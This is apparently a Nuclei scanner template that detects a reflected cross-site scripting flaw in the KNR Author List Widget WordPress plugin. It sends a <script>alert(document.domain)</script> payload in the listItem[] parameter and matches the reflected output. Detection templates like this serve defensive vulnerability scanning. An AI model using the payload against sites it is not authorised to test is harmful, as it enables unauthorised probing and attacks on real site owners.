id: knr-widget-xss

info:
  name: KNR Author List Widget - Cross-site Scripting
  author: theamanrawat
  severity: medium
  description: |
    KNR Author List Widget suffers from Cross-site Scripting (XSS) in the listItem[] parameter.
  reference:
    - https://wordpress.org/plugins/knr-author-list-widget/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
  tags: xss,knr-author-list-widget,wordpress,wp,wp-plugin

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php?listItem[]=<script>alert(document.domain)</script>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'item: <script>alert(document.domain)</script>'
          - 'Saved on'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f302244baa8616ef0bf1e955faec2d2dab8daf228b174d8272914e20bf4acd88022100f2cbe51e66938942aeece873f9b7ab012aef2e3b575c75e8c2b666278a36867e:922c64590222798bb761d5b6d8e72950